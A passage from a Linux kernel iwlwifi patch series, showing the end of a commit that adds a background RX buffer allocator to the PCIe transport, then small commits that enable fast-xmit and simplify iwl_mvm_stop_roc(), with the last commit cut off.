queue has released 8 pages it tries claiming the request. If the pages are not ready - it keeps claiming. This new model should make sure that RBDs are always available across the multiple queues. The RBDs are transferred between the allocator and the queue. The queue moves the free RBDs upon freeing them to the allocator. The allocator moves them back to the queue's possession when the request is claimed. The allocator has an initial pool to make sure there are always RBDs available for the request completion. Release of the buffers at exit is done per pools - the allocator frees its own initial pool and the queue frees its own pool. Existing code refactor - -Queue's initial pool is the size of the queue only as the allocation of the new buffers no longer uses this pool. -Removal of replenish background work, and replenish calls in the interrupt handler and restock(). -The replenish() and the rxq used_list are used only during initialization. -Moved page allocation to a new function for code reuse. New code - Allocator code - new structure and functions. Interrupt handler uses the allocator functions for replenishing buffers. Reuse of the restock() method. Signed-off-by: Sara Sharon Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fh.h | 6 - drivers/net/wireless/iwlwifi/pcie/internal.h | 51 ++- drivers/net/wireless/iwlwifi/pcie/rx.c | 414 +++++++++++++++---- 3 files changed, 374 insertions(+), 97 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fh.h b/drivers/net/wireless/iwlwifi/iwl-fh.h index d45dc021cda2..d56064861a9c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fh.h +++ b/drivers/net/wireless/iwlwifi/iwl-fh.h @@ -438,12 +438,6 @@ static inline unsigned int FH_MEM_CBBC_QUEUE(unsigned int chnl) #define RX_QUEUE_MASK 255 #define RX_QUEUE_SIZE_LOG 8 -/* - * RX related structures and functions - */ -#define RX_FREE_BUFFERS 64 -#define RX_LOW_WATERMARK 8 - /** * struct iwl_rb_status - reserve buffer status * host memory mapped FH registers diff --git a/drivers/net/wireless/iwlwifi/pcie/internal.h b/drivers/net/wireless/iwlwifi/pcie/internal.h index 01996c9d98a7..9a3dae676cc5 100644 --- a/drivers/net/wireless/iwlwifi/pcie/internal.h +++ b/drivers/net/wireless/iwlwifi/pcie/internal.h @@ -44,6 +44,15 @@ #include "iwl-io.h" #include "iwl-op-mode.h" +/* + * RX related structures and functions + */ +#define RX_NUM_QUEUES 1 +#define RX_POST_REQ_ALLOC 2 +#define RX_CLAIM_REQ_ALLOC 8 +#define RX_POOL_SIZE ((RX_CLAIM_REQ_ALLOC - RX_POST_REQ_ALLOC) * RX_NUM_QUEUES) +#define RX_LOW_WATERMARK 8 + struct iwl_host_cmd; /*This file includes the declaration that are internal to the @@ -77,29 +86,29 @@ struct isr_statistics { * struct iwl_rxq - Rx queue * @bd: driver's pointer to buffer of receive buffer descriptors (rbd) * @bd_dma: bus address of buffer of receive buffer descriptors (rbd) - * @pool: - * @queue: * @read: Shared index to newest available Rx buffer * @write: Shared index to oldest written Rx packet * @free_count: Number of pre-allocated buffers in rx_free + * @used_count: Number of RBDs handled to allocator to use for allocation * @write_actual: - * @rx_free: list of free SKBs for use - * @rx_used: List of Rx buffers with no SKB + * @rx_free: list of RBDs with allocated RB ready for use + * @rx_used: list of RBDs with no RB attached * @need_update: flag to indicate we need to update read/write index * @rb_stts: driver's pointer to receive buffer status * @rb_stts_dma: bus address of receive buffer status * @lock: + * @pool: initial pool of iwl_rx_mem_buffer for the queue + * @queue: actual rx queue * * NOTE: rx_free and rx_used are used as a FIFO for iwl_rx_mem_buffers */ struct iwl_rxq { __le32 *bd; dma_addr_t bd_dma; - struct iwl_rx_mem_buffer pool[RX_QUEUE_SIZE + RX_FREE_BUFFERS]; - struct iwl_rx_mem_buffer *queue[RX_QUEUE_SIZE]; u32 read; u32 write; u32 free_count; + u32 used_count; u32 write_actual; struct list_head rx_free; struct list_head rx_used; @@ -107,6 +116,32 @@ struct iwl_rxq { struct iwl_rb_status *rb_stts; dma_addr_t rb_stts_dma; spinlock_t lock; + struct iwl_rx_mem_buffer pool[RX_QUEUE_SIZE]; + struct iwl_rx_mem_buffer *queue[RX_QUEUE_SIZE]; +}; + +/** + * struct iwl_rb_allocator - Rx allocator + * @pool: initial pool of allocator + * @req_pending: number of requests the allcator had not processed yet + * @req_ready: number of requests honored and ready for claiming + * @rbd_allocated: RBDs with pages allocated and ready to be handled to + * the queue. This is a list of &struct iwl_rx_mem_buffer + * @rbd_empty: RBDs with no page attached for allocator use. This is a list + * of &struct iwl_rx_mem_buffer + * @lock: protects the rbd_allocated and rbd_empty lists + * @alloc_wq: work queue for background calls + * @rx_alloc: work struct for background calls + */ +struct iwl_rb_allocator { + struct iwl_rx_mem_buffer pool[RX_POOL_SIZE]; + atomic_t req_pending; + atomic_t req_ready; + struct list_head rbd_allocated; + struct list_head rbd_empty; + spinlock_t lock; + struct workqueue_struct *alloc_wq; + struct work_struct rx_alloc; }; struct iwl_dma_ptr { @@ -250,7 +285,7 @@ iwl_pcie_get_scratchbuf_dma(struct iwl_txq *txq, int idx) /** * struct iwl_trans_pcie - PCIe transport specific data * @rxq: all the RX queue data - * @rx_replenish: work that will be called when buffers need to be allocated + * @rba: allocator for RX replenishing * @drv - pointer to iwl_drv * @trans: pointer to the generic transport area * @scd_base_addr: scheduler sram base address in SRAM @@ -273,7 +308,7 @@ iwl_pcie_get_scratchbuf_dma(struct iwl_txq *txq, int idx) */ struct iwl_trans_pcie { struct iwl_rxq rxq; - struct work_struct rx_replenish; + struct iwl_rb_allocator rba; struct iwl_trans *trans; struct iwl_drv *drv; diff --git a/drivers/net/wireless/iwlwifi/pcie/rx.c b/drivers/net/wireless/iwlwifi/pcie/rx.c index adad8d0fae7f..a3fbaa0ef5e0 100644 --- a/drivers/net/wireless/iwlwifi/pcie/rx.c +++ b/drivers/net/wireless/iwlwifi/pcie/rx.c @@ -1,7 +1,7 @@ /****************************************************************************** * * Copyright(c) 2003 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * Portions of this file are derived from the ipw3945 project, as well * as portions of the ieee80211 subsystem header files. @@ -74,16 +74,29 @@ * resets the Rx queue buffers with new memory. * * The management in the driver is as follows: - * + A list of pre-allocated SKBs is stored in iwl->rxq->rx_free. When - * iwl->rxq->free_count drops to or below RX_LOW_WATERMARK, work is scheduled - * to replenish the iwl->rxq->rx_free. - * + In iwl_pcie_rx_replenish (scheduled) if 'processed' != 'read' then the - * iwl->rxq is replenished and the READ INDEX is updated (updating the - * 'processed' and 'read' driver indexes as well) + * + A list of pre-allocated RBDs is stored in iwl->rxq->rx_free. + * When the interrupt handler is called, the request is processed. + * The page is either stolen - transferred to the upper layer + * or reused - added immediately to the iwl->rxq->rx_free list. + * + When the page is stolen - the driver updates the matching queue's used + * count, detaches the RBD and transfers it to the queue used list. + * When there are two used RBDs - they are transferred to the allocator empty + * list. Work is then scheduled for the allocator to start allocating + * eight buffers. + * When there are another 6 used RBDs - they are transferred to the allocator + * empty list and the driver tries to claim the pre-allocated buffers and + * add them to iwl->rxq->rx_free. If it fails - it continues to claim them + * until ready. + * When there are 8+ buffers in the free list - either from allocation or from + * 8 reused unstolen pages - restock is called to update the FW and indexes. + * + In order to make sure the allocator always has RBDs to use for allocation + * the allocator has initial pool in the size of num_queues*(8-2) - the + * maximum missing RBDs per allocation request (request posted with 2 + * empty RBDs, there is no guarantee when the other 6 RBDs are supplied). + * The queues supplies the recycle of the rest of the RBDs. * + A received packet is processed and handed to the kernel network stack, * detached from the iwl->rxq. The driver 'processed' index is updated. - * + The Host/Firmware iwl->rxq is replenished at irq thread time from the - * rx_free list. If there are no allocated buffers in iwl->rxq->rx_free, + * + If there are no allocated buffers in iwl->rxq->rx_free, * the READ INDEX is not incremented and iwl->status(RX_STALLED) is set. * If there were enough free buffers and RX_STALLED is set it is cleared. * @@ -92,18 +105,32 @@ * * iwl_rxq_alloc() Allocates rx_free * iwl_pcie_rx_replenish() Replenishes rx_free list from rx_used, and calls - * iwl_pcie_rxq_restock + * iwl_pcie_rxq_restock. + * Used only during initialization. * iwl_pcie_rxq_restock() Moves available buffers from rx_free into Rx * queue, updates firmware pointers, and updates - * the WRITE index. If insufficient rx_free buffers - * are available, schedules iwl_pcie_rx_replenish + * the WRITE index. + * iwl_pcie_rx_allocator() Background work for allocating pages. * * -- enable interrupts -- * ISR - iwl_rx() Detach iwl_rx_mem_buffers from pool up to the * READ INDEX, detaching the SKB from the pool. * Moves the packet buffer from queue to rx_used. + * Posts and claims requests to the allocator. * Calls iwl_pcie_rxq_restock to refill any empty * slots. + * + * RBD life-cycle: + * + * Init: + * rxq.pool -> rxq.rx_used -> rxq.rx_free -> rxq.queue + * + * Regular Receive interrupt: + * Page Stolen: + * rxq.queue -> rxq.rx_used -> allocator.rbd_empty -> + * allocator.rbd_allocated -> rxq.rx_free -> rxq.queue + * Page not Stolen: + * rxq.queue -> rxq.rx_free -> rxq.queue * ... * */ @@ -240,10 +267,6 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) rxq->free_count--; } spin_unlock(&rxq->lock); - /* If the pre-allocated buffer pool is dropping low, schedule to - * refill it */ - if (rxq->free_count <= RX_LOW_WATERMARK) - schedule_work(&trans_pcie->rx_replenish); /* If we've added more space for the firmware to place data, tell it. * Increment device's write pointer in multiples of 8. */ @@ -254,6 +277,44 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) } } +/* + * iwl_pcie_rx_alloc_page - allocates and returns a page. + * + */ +static struct page *iwl_pcie_rx_alloc_page(struct iwl_trans *trans) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rxq *rxq = &trans_pcie->rxq; + struct page *page; + gfp_t gfp_mask = GFP_KERNEL; + + if (rxq->free_count > RX_LOW_WATERMARK) + gfp_mask |= __GFP_NOWARN; + + if (trans_pcie->rx_page_order > 0) + gfp_mask |= __GFP_COMP; + + /* Alloc a new receive buffer */ + page = alloc_pages(gfp_mask, trans_pcie->rx_page_order); + if (!page) { + if (net_ratelimit()) + IWL_DEBUG_INFO(trans, "alloc_pages failed, order: %d\n", + trans_pcie->rx_page_order); + /* Issue an error if the hardware has consumed more than half + * of its free buffer list and we don't have enough + * pre-allocated buffers. +` */ + if (rxq->free_count <= RX_LOW_WATERMARK && + iwl_rxq_space(rxq) > (RX_QUEUE_SIZE / 2) && + net_ratelimit()) + IWL_CRIT(trans, + "Failed to alloc_pages with GFP_KERNEL. Only %u free buffers remaining.\n", + rxq->free_count); + return NULL; + } + return page; +} + /* * iwl_pcie_rxq_alloc_rbs - allocate a page for each used RBD * @@ -263,13 +324,12 @@ static void iwl_pcie_rxq_restock(struct iwl_trans *trans) * iwl_pcie_rxq_restock. The latter function will update the HW to use the newly * allocated buffers. */ -static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority) +static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; struct iwl_rx_mem_buffer *rxb; struct page *page; - gfp_t gfp_mask = priority; while (1) { spin_lock(&rxq->lock); @@ -279,32 +339,10 @@ static void iwl_pcie_rxq_alloc_rbs(struct iwl_trans *trans, gfp_t priority) } spin_unlock(&rxq->lock); - if (rxq->free_count > RX_LOW_WATERMARK) - gfp_mask |= __GFP_NOWARN; - - if (trans_pcie->rx_page_order > 0) - gfp_mask |= __GFP_COMP; - /* Alloc a new receive buffer */ - page = alloc_pages(gfp_mask, trans_pcie->rx_page_order); - if (!page) { - if (net_ratelimit()) - IWL_DEBUG_INFO(trans, "alloc_pages failed, " - "order: %d\n", - trans_pcie->rx_page_order); - - if ((rxq->free_count <= RX_LOW_WATERMARK) && - net_ratelimit()) - IWL_CRIT(trans, "Failed to alloc_pages with %s." - "Only %u free buffers remaining.\n", - priority == GFP_ATOMIC ? - "GFP_ATOMIC" : "GFP_KERNEL", - rxq->free_count); - /* We don't reschedule replenish work here -- we will - * call the restock method and if it still needs - * more buffers it will schedule replenish */ + page = iwl_pcie_rx_alloc_page(trans); + if (!page) return; - } spin_lock(&rxq->lock); @@ -355,7 +393,7 @@ static void iwl_pcie_rxq_free_rbs(struct iwl_trans *trans) lockdep_assert_held(&rxq->lock); - for (i = 0; i < RX_FREE_BUFFERS + RX_QUEUE_SIZE; i++) { + for (i = 0; i < RX_QUEUE_SIZE; i++) { if (!rxq->pool[i].page) continue; dma_unmap_page(trans->dev, rxq->pool[i].page_dma, @@ -372,32 +410,144 @@ static void iwl_pcie_rxq_free_rbs(struct iwl_trans *trans) * When moving to rx_free an page is allocated for the slot. * * Also restock the Rx queue via iwl_pcie_rxq_restock. - * This is called as a scheduled work item (except for during initialization) + * This is called only during initialization */ -static void iwl_pcie_rx_replenish(struct iwl_trans *trans, gfp_t gfp) +static void iwl_pcie_rx_replenish(struct iwl_trans *trans) { - iwl_pcie_rxq_alloc_rbs(trans, gfp); + iwl_pcie_rxq_alloc_rbs(trans); iwl_pcie_rxq_restock(trans); } -static void iwl_pcie_rx_replenish_work(struct work_struct *data) +/* + * iwl_pcie_rx_allocator - Allocates pages in the background for RX queues + * + * Allocates for each received request 8 pages + * Called as a scheduled work item. + */ +static void iwl_pcie_rx_allocator(struct iwl_trans *trans) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + + while (atomic_read(&rba->req_pending)) { + int i; + struct list_head local_empty; + struct list_head local_allocated; + + INIT_LIST_HEAD(&local_allocated); + spin_lock(&rba->lock); + /* swap out the entire rba->rbd_empty to a local list */ + list_replace_init(&rba->rbd_empty, &local_empty); + spin_unlock(&rba->lock); + + for (i = 0; i < RX_CLAIM_REQ_ALLOC;) { + struct iwl_rx_mem_buffer *rxb; + struct page *page; + + /* List should never be empty - each reused RBD is + * returned to the list, and initial pool covers any + * possible gap between the time the page is allocated + * to the time the RBD is added. + */ + BUG_ON(list_empty(&local_empty)); + /* Get the first rxb from the rbd list */ + rxb = list_first_entry(&local_empty, + struct iwl_rx_mem_buffer, list); + BUG_ON(rxb->page); + + /* Alloc a new receive buffer */ + page = iwl_pcie_rx_alloc_page(trans); + if (!page) + continue; + rxb->page = page; + + /* Get physical address of the RB */ + rxb->page_dma = dma_map_page(trans->dev, page, 0, + PAGE_SIZE << trans_pcie->rx_page_order, + DMA_FROM_DEVICE); + if (dma_mapping_error(trans->dev, rxb->page_dma)) { + rxb->page = NULL; + __free_pages(page, trans_pcie->rx_page_order); + continue; + } + /* dma address must be no more than 36 bits */ + BUG_ON(rxb->page_dma & ~DMA_BIT_MASK(36)); + /* and also 256 byte aligned! */ + BUG_ON(rxb->page_dma & DMA_BIT_MASK(8)); + + /* move the allocated entry to the out list */ + list_move(&rxb->list, &local_allocated); + i++; + } + + spin_lock(&rba->lock); + /* add the allocated rbds to the allocator allocated list */ + list_splice_tail(&local_allocated, &rba->rbd_allocated); + /* add the unused rbds back to the allocator empty list */ + list_splice_tail(&local_empty, &rba->rbd_empty); + spin_unlock(&rba->lock); + + atomic_dec(&rba->req_pending); + atomic_inc(&rba->req_ready); + } +} + +/* + * iwl_pcie_rx_allocator_get - Returns the pre-allocated pages +.* +.* Called by queue when the queue posted allocation request and + * has freed 8 RBDs in order to restock itself. + */ +static int iwl_pcie_rx_allocator_get(struct iwl_trans *trans, + struct iwl_rx_mem_buffer + *out[RX_CLAIM_REQ_ALLOC]) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + int i; + + if (atomic_dec_return(&rba->req_ready) < 0) { + atomic_inc(&rba->req_ready); + IWL_DEBUG_RX(trans, + "Allocation request not ready, pending requests = %d\n", + atomic_read(&rba->req_pending)); + return -ENOMEM; + } + + spin_lock(&rba->lock); + for (i = 0; i < RX_CLAIM_REQ_ALLOC; i++) { + /* Get next free Rx buffer, remove it from free list */ + out[i] = list_first_entry(&rba->rbd_allocated, + struct iwl_rx_mem_buffer, list); + list_del(&out[i]->list); + } + spin_unlock(&rba->lock); + + return 0; +} + +static void iwl_pcie_rx_allocator_work(struct work_struct *data) { + struct iwl_rb_allocator *rba_p = + container_of(data, struct iwl_rb_allocator, rx_alloc); struct iwl_trans_pcie *trans_pcie = - container_of(data, struct iwl_trans_pcie, rx_replenish); + container_of(rba_p, struct iwl_trans_pcie, rba); - iwl_pcie_rx_replenish(trans_pcie->trans, GFP_KERNEL); + iwl_pcie_rx_allocator(trans_pcie->trans); } static int iwl_pcie_rx_alloc(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; struct device *dev = trans->dev; memset(&trans_pcie->rxq, 0, sizeof(trans_pcie->rxq)); spin_lock_init(&rxq->lock); + spin_lock_init(&rba->lock); if (WARN_ON(rxq->bd || rxq->rb_stts)) return -EINVAL; @@ -487,15 +637,49 @@ static void iwl_pcie_rx_init_rxb_lists(struct iwl_rxq *rxq) INIT_LIST_HEAD(&rxq->rx_free); INIT_LIST_HEAD(&rxq->rx_used); rxq->free_count = 0; + rxq->used_count = 0; - for (i = 0; i < RX_FREE_BUFFERS + RX_QUEUE_SIZE; i++) + for (i = 0; i < RX_QUEUE_SIZE; i++) list_add(&rxq->pool[i].list, &rxq->rx_used); } +static void iwl_pcie_rx_init_rba(struct iwl_rb_allocator *rba) +{ + int i; + + lockdep_assert_held(&rba->lock); + + INIT_LIST_HEAD(&rba->rbd_allocated); + INIT_LIST_HEAD(&rba->rbd_empty); + + for (i = 0; i < RX_POOL_SIZE; i++) + list_add(&rba->pool[i].list, &rba->rbd_empty); +} + +static void iwl_pcie_rx_free_rba(struct iwl_trans *trans) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + int i; + + lockdep_assert_held(&rba->lock); + + for (i = 0; i < RX_POOL_SIZE; i++) { + if (!rba->pool[i].page) + continue; + dma_unmap_page(trans->dev, rba->pool[i].page_dma, + PAGE_SIZE << trans_pcie->rx_page_order, + DMA_FROM_DEVICE); + __free_pages(rba->pool[i].page, trans_pcie->rx_page_order); + rba->pool[i].page = NULL; + } +} + int iwl_pcie_rx_init(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; int i, err; if (!rxq->bd) { @@ -503,11 +687,21 @@ int iwl_pcie_rx_init(struct iwl_trans *trans) if (err) return err; } + if (!rba->alloc_wq) + rba->alloc_wq = alloc_workqueue("rb_allocator", + WQ_HIGHPRI | WQ_UNBOUND, 1); + INIT_WORK(&rba->rx_alloc, iwl_pcie_rx_allocator_work); + + spin_lock(&rba->lock); + atomic_set(&rba->req_pending, 0); + atomic_set(&rba->req_ready, 0); + /* free all first - we might be reconfigured for a different size */ + iwl_pcie_rx_free_rba(trans); + iwl_pcie_rx_init_rba(rba); + spin_unlock(&rba->lock); spin_lock(&rxq->lock); - INIT_WORK(&trans_pcie->rx_replenish, iwl_pcie_rx_replenish_work); - /* free all first - we might be reconfigured for a different size */ iwl_pcie_rxq_free_rbs(trans); iwl_pcie_rx_init_rxb_lists(rxq); @@ -522,7 +716,7 @@ int iwl_pcie_rx_init(struct iwl_trans *trans) memset(rxq->rb_stts, 0, sizeof(*rxq->rb_stts)); spin_unlock(&rxq->lock); - iwl_pcie_rx_replenish(trans, GFP_KERNEL); + iwl_pcie_rx_replenish(trans); iwl_pcie_rx_hw_init(trans, rxq); @@ -537,6 +731,7 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; + struct iwl_rb_allocator *rba = &trans_pcie->rba; /*if rxq->bd is NULL, it means that nothing has been allocated, * exit now */ @@ -545,7 +740,15 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) return; } - cancel_work_sync(&trans_pcie->rx_replenish); + cancel_work_sync(&rba->rx_alloc); + if (rba->alloc_wq) { + destroy_workqueue(rba->alloc_wq); + rba->alloc_wq = NULL; + } + + spin_lock(&rba->lock); + iwl_pcie_rx_free_rba(trans); + spin_unlock(&rba->lock); spin_lock(&rxq->lock); iwl_pcie_rxq_free_rbs(trans); @@ -566,6 +769,43 @@ void iwl_pcie_rx_free(struct iwl_trans *trans) rxq->rb_stts = NULL; } +/* + * iwl_pcie_rx_reuse_rbd - Recycle used RBDs + * + * Called when a RBD can be reused. The RBD is transferred to the allocator. + * When there are 2 empty RBDs - a request for allocation is posted + */ +static void iwl_pcie_rx_reuse_rbd(struct iwl_trans *trans, + struct iwl_rx_mem_buffer *rxb, + struct iwl_rxq *rxq) +{ + struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); + struct iwl_rb_allocator *rba = &trans_pcie->rba; + + /* Count the used RBDs */ + rxq->used_count++; + + /* Move the RBD to the used list, will be moved to allocator in batches + * before claiming or posting a request*/ + list_add_tail(&rxb->list, &rxq->rx_used); + + /* If we have RX_POST_REQ_ALLOC new released rx buffers - + * issue a request for allocator. Modulo RX_CLAIM_REQ_ALLOC is + * used for the case we failed to claim RX_CLAIM_REQ_ALLOC, + * after but we still need to post another request. + */ + if ((rxq->used_count % RX_CLAIM_REQ_ALLOC) == RX_POST_REQ_ALLOC) { + /* Move the 2 RBDs to the allocator ownership. + Allocator has another 6 from pool for the request completion*/ + spin_lock(&rba->lock); + list_splice_tail_init(&rxq->rx_used, &rba->rbd_empty); + spin_unlock(&rba->lock); + + atomic_inc(&rba->req_pending); + queue_work(rba->alloc_wq, &rba->rx_alloc); + } +} + static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans, struct iwl_rx_mem_buffer *rxb) { @@ -688,13 +928,13 @@ static void iwl_pcie_rx_handle_rb(struct iwl_trans *trans, */ __free_pages(rxb->page, trans_pcie->rx_page_order); rxb->page = NULL; - list_add_tail(&rxb->list, &rxq->rx_used); + iwl_pcie_rx_reuse_rbd(trans, rxb, rxq); } else { list_add_tail(&rxb->list, &rxq->rx_free); rxq->free_count++; } } else - list_add_tail(&rxb->list, &rxq->rx_used); + iwl_pcie_rx_reuse_rbd(trans, rxb, rxq); } /* @@ -704,10 +944,7 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) { struct iwl_trans_pcie *trans_pcie = IWL_TRANS_GET_PCIE_TRANS(trans); struct iwl_rxq *rxq = &trans_pcie->rxq; - u32 r, i; - u8 fill_rx = 0; - u32 count = 8; - int total_empty; + u32 r, i, j; restart: spin_lock(&rxq->lock); @@ -720,14 +957,6 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) if (i == r) IWL_DEBUG_RX(trans, "HW = SW = %d\n", r); - /* calculate total frames need to be restock after handling RX */ - total_empty = r - rxq->write_actual; - if (total_empty < 0) - total_empty += RX_QUEUE_SIZE; - - if (total_empty > (RX_QUEUE_SIZE / 2)) - fill_rx = 1; - while (i != r) { struct iwl_rx_mem_buffer *rxb; @@ -739,29 +968,48 @@ static void iwl_pcie_rx_handle(struct iwl_trans *trans) iwl_pcie_rx_handle_rb(trans, rxb); i = (i + 1) & RX_QUEUE_MASK; - /* If there are a lot of unused frames, - * restock the Rx queue so ucode wont assert. */ - if (fill_rx) { - count++; - if (count >= 8) { - rxq->read = i; - spin_unlock(&rxq->lock); - iwl_pcie_rx_replenish(trans, GFP_ATOMIC); - count = 0; - goto restart; + + /* If we have RX_CLAIM_REQ_ALLOC released rx buffers - + * try to claim the pre-allocated buffers from the allocator */ + if (rxq->used_count >= RX_CLAIM_REQ_ALLOC) { + struct iwl_rb_allocator *rba = &trans_pcie->rba; + struct iwl_rx_mem_buffer *out[RX_CLAIM_REQ_ALLOC]; + + /* Add the remaining 6 empty RBDs for allocator use */ + spin_lock(&rba->lock); + list_splice_tail_init(&rxq->rx_used, &rba->rbd_empty); + spin_unlock(&rba->lock); + + /* If not ready - continue, will try to reclaim later. + * No need to reschedule work - allocator exits only on + * success */ + if (!iwl_pcie_rx_allocator_get(trans, out)) { + /* If success - then RX_CLAIM_REQ_ALLOC + * buffers were retrieved and should be added + * to free list */ + rxq->used_count -= RX_CLAIM_REQ_ALLOC; + for (j = 0; j < RX_CLAIM_REQ_ALLOC; j++) { + list_add_tail(&out[j]->list, + &rxq->rx_free); + rxq->free_count++; + } } } + /* handle restock for two cases: + * - we just pulled buffers from the allocator + * - we have 8+ unstolen pages accumulated */ + if (rxq->free_count >= RX_CLAIM_REQ_ALLOC) { + rxq->read = i; + spin_unlock(&rxq->lock); + iwl_pcie_rxq_restock(trans); + goto restart; + } } /* Backtrack one entry */ rxq->read = i; spin_unlock(&rxq->lock); - if (fill_rx) - iwl_pcie_rx_replenish(trans, GFP_ATOMIC); - else - iwl_pcie_rxq_restock(trans); - if (trans_pcie->napi.poll) napi_gro_flush(&trans_pcie->napi, false); } From 0d060384be7b65cfc33a86be75d5cc41af78c654 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 17 Apr 2015 15:50:43 +0200 Subject: [PATCH 629/872] iwlwifi: mvm: enable IEEE80211_HW_SUPPORT_FAST_XMIT Since the firmware is responsible for duration calculation, the driver can easily support fast-xmit. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 9e517e20a14e..57d75d14fc80 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -428,6 +428,7 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) IEEE80211_HW_TIMING_BEACON_ONLY | IEEE80211_HW_CONNECTION_MONITOR | IEEE80211_HW_CHANCTX_STA_CSA | + IEEE80211_HW_SUPPORT_FAST_XMIT | IEEE80211_HW_SUPPORTS_CLONED_SKBS; hw->queues = mvm->first_agg_queue; From aa42fb2420d4dc213d8306a9e0fdddf7ba83a10c Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Fri, 17 Apr 2015 15:50:43 +0200 Subject: [PATCH 630/872] iwlwifi: dvm: enable IEEE80211_HW_SUPPORT_FAST_XMIT Since the firmware is responsible for duration calculation, the driver can easily support fast-xmit. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/dvm/mac80211.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/net/wireless/iwlwifi/dvm/mac80211.c b/drivers/net/wireless/iwlwifi/dvm/mac80211.c index ba7fc42edf97..852461ffe98f 100644 --- a/drivers/net/wireless/iwlwifi/dvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/dvm/mac80211.c @@ -112,6 +112,7 @@ int iwlagn_mac_setup_register(struct iwl_priv *priv, IEEE80211_HW_QUEUE_CONTROL | IEEE80211_HW_SUPPORTS_PS | IEEE80211_HW_SUPPORTS_DYNAMIC_PS | + IEEE80211_HW_SUPPORT_FAST_XMIT | IEEE80211_HW_WANT_MONITOR_VIF; hw->offchannel_tx_hw_queue = IWL_AUX_QUEUE; From ebf17ff9bb46206ca7a4bc7260bff52f593c25db Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Mon, 1 Jun 2015 23:38:23 +0200 Subject: [PATCH 631/872] iwlwifi: mvm: simplify iwl_mvm_stop_roc() As pointed out by smatch, there's no need for a loop that always immediately terminates. Use an if statement instead and while at it clean up the mvmvif initialization. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/time-event.c | 18 +++++++----------- 1 file changed, 7 insertions(+), 11 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/time-event.c b/drivers/net/wireless/iwlwifi/mvm/time-event.c index a7448cf01688..d24b6a83e68c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/time-event.c +++ b/drivers/net/wireless/iwlwifi/mvm/time-event.c @@ -797,13 +797,12 @@ int iwl_mvm_start_p2p_roc(struct iwl_mvm *mvm, struct ieee80211_vif *vif, void iwl_mvm_stop_roc(struct iwl_mvm *mvm) { - struct iwl_mvm_vif *mvmvif; + struct iwl_mvm_vif *mvmvif = NULL; struct iwl_mvm_time_event_data *te_data; bool is_p2p = false; lockdep_assert_held(&mvm->mutex); - mvmvif = NULL; spin_lock_bh(&mvm->time_event_lock); /* @@ -821,17 +820,14 @@ void iwl_mvm_stop_roc(struct iwl_mvm *mvm) } } - /* - * Iterate over the list of aux roc time events and find the time - * event that is associated with a BSS interface. - * This assumes that a BSS interface can have only a single time - * event at any given time and this time event corresponds to a ROC - * request + /* There can only be at most one AUX ROC time event, we just use the + * list to simplify/unify code. Remove it if it exists. */ - list_for_each_entry(te_data, &mvm->aux_roc_te_list, list) { + te_data = list_first_entry_or_null(&mvm->aux_roc_te_list, + struct iwl_mvm_time_event_data, + list); + if (te_data) mvmvif = iwl_mvm_vif_from_mac80211(te_data->vif); - goto remove_te; - } remove_te: spin_unlock_bh(&mvm->time_event_lock); From 859d914c8f5ca5b3c9274ad69c4c942954f67cda Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Mon, 1 Jun 2015 17:11:11 +0200 Subject: [PATCH 632/872] iwlwifi: prepare for higher API/CAPA bits Currently, loading the firmware fails when it has higher API or CAPA bits than the driver supports. That's an issue with integration. At the same time, actually using api[0] and 